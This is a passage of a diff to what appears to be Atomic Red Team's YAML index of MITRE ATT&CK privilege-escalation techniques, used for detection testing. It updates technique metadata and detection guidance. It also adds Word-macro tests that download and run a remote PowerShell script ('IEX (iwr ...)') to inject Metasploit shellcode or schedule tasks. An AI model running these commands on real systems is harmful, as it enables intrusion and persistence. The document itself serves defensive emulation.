Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
@@ -3589,6 +3612,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-640
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/640.html
- source_name: Man LD.SO
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
@@ -3618,7 +3647,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-15T21:59:25.358Z'
+ modified: '2020-09-16T16:49:46.904Z'
created: '2020-03-13T20:09:59.569Z'
x_mitre_platforms:
- Linux
@@ -3631,7 +3660,7 @@ privilege-escalation:
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -3900,6 +3929,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.004
url: https://attack.mitre.org/techniques/T1543/004
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
@@ -3946,11 +3981,11 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:27:49.609Z'
+ modified: '2020-09-16T15:46:44.130Z'
created: '2020-01-17T19:23:15.227Z'
x_mitre_data_sources:
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_effective_permissions:
- root
@@ -4813,62 +4848,55 @@ privilege-escalation:
atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -4886,9 +4914,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -4904,6 +4932,16 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -4928,23 +4966,13 @@ privilege-escalation:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -4972,7 +5000,17 @@ privilege-escalation:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5365,6 +5403,71 @@ privilege-escalation:
$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile
name: powershell
+ T1547.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.012
+ url: https://attack.mitre.org/techniques/T1547/012
+ - source_name: Microsoft AddPrintProcessor May 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
+ description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
+ October 5, 2020.
+ - source_name: ESET PipeMon May 2020
+ url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
+ description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
+ Group. Retrieved August 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Print Processors
+ description: "Adversaries may abuse print processors to run malicious DLLs during
+ system boot for persistence and/or privilege escalation. Print processors
+ are DLLs that are loaded by the print spooler service, spoolsv.exe, during
+ boot. \n\nAdversaries may abuse the print spooler service by adding print
+ processors that load malicious DLLs at startup. A print processor can be installed
+ through the AddPrintProcessor API call with an account that has
+ SeLoadDriverPrivilege enabled. Alternatively, a print processor
+ can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet
+ or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture:
+ e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry
+ key that points to the DLL. For the print processor to be correctly installed,
+ it must be located in the system print-processor directory that can be found
+ with the GetPrintProcessorDirectory API call.(Citation: Microsoft
+ AddPrintProcessor May 2018) After the print processors are installed, the
+ print spooler service, which starts during boot, must be restarted in order
+ for them to run.(Citation: ESET PipeMon May 2020) The print spooler service
+ runs under SYSTEM level permissions, therefore print processors installed
+ by an adversary may run under elevated privileges."
+ id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T16:05:36.344Z'
+ created: '2020-10-05T13:24:49.780Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations.
+
+ Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
+ - File monitoring
+ - DLL monitoring
+ - API monitoring
+ x_mitre_contributors:
+ - Mathieu Tartare, ESET
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1055.009:
technique:
external_references:
@@ -5641,6 +5744,39 @@ privilege-escalation:
'
name: powershell
+ - name: RunPE via VBA
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
+ description: 'This module executes calc.exe from within the WINWORD.EXE process
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
+ name: powershell
T1055:
technique:
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
@@ -5778,6 +5914,37 @@ privilege-escalation:
mavinject $mypid /INJECTRUNNING #{dll_payload}
name: powershell
elevation_required: true
+ - name: Shellcode execution via VBA
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
+ description: |
+ This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+ with Metasploit, for use on x86-64 Windows 10 machines.
+
+ Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+ is required.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+ name: powershell
T1055.008:
technique:
external_references:
@@ -6024,6 +6191,14 @@ privilege-escalation:
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
source_name: Microsoft Run Key
+ - source_name: Microsoft Wow6432Node 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
+ description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data
+ in the Registry. Retrieved August 3, 2020.
+ - source_name: Malwarebytes Wow6432Node 2016
+ url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
+ description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved
+ August 3, 2020.
- url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry
Key. Retrieved June 29, 2018.
@@ -6046,26 +6221,30 @@ privilege-escalation:
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
- The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+ Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
@@ -6083,9 +6262,9 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:16:26.182Z'
+ modified: '2020-08-03T16:30:26.918Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -6479,10 +6658,58 @@ privilege-escalation:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
@@ -6494,35 +6721,21 @@ privilege-escalation:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -6533,19 +6746,18 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.002:
technique:
@@ -6707,9 +6919,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -6727,7 +6939,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -6762,9 +6974,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -6815,7 +7027,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -7321,10 +7533,7 @@ privilege-escalation:
service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd
functionality to establish persistent access to victim systems by creating
and/or modifying service unit files that cause systemd to execute malicious
- commands at recurring intervals, such as at system boot.(Citation: Anomali
- Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation:
- Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation:
- acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries
+ commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries
typically require root privileges to create/modify service unit files in the
/etc/systemd/system and /usr/lib/systemd/system
directories, low privilege users can create/modify service unit files in directories
@@ -7338,6 +7547,12 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.002
url: https://attack.mitre.org/techniques/T1543/002
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- source_name: 'Linux man-pages: systemd January 2014'
url: http://man7.org/linux/man-pages/man1/systemd.1.html
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
@@ -7350,18 +7565,6 @@ privilege-escalation:
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
- - source_name: gist Arch package compromise 10JUL2018
- url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
- Arch package compromise. Retrieved April 23, 2019.
- - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
- url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
- AUR Package Repository. Retrieved April 23, 2019.
- - source_name: acroread package compromised Arch Linux Mail 8JUL2018
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
- April 23, 2019.
- source_name: Rapid7 Service Persistence 22JUNE2016
url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
description: Rapid7. (2016, June 22). Service Persistence. Retrieved April
@@ -7372,7 +7575,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:13:59.473Z'
+ modified: '2020-10-09T13:46:29.701Z'
created: '2020-01-17T16:15:19.870Z'
x_mitre_platforms:
- Linux
@@ -7386,7 +7589,7 @@ privilege-escalation:
- User
- root
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
@@ -7461,6 +7664,73 @@ privilege-escalation:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
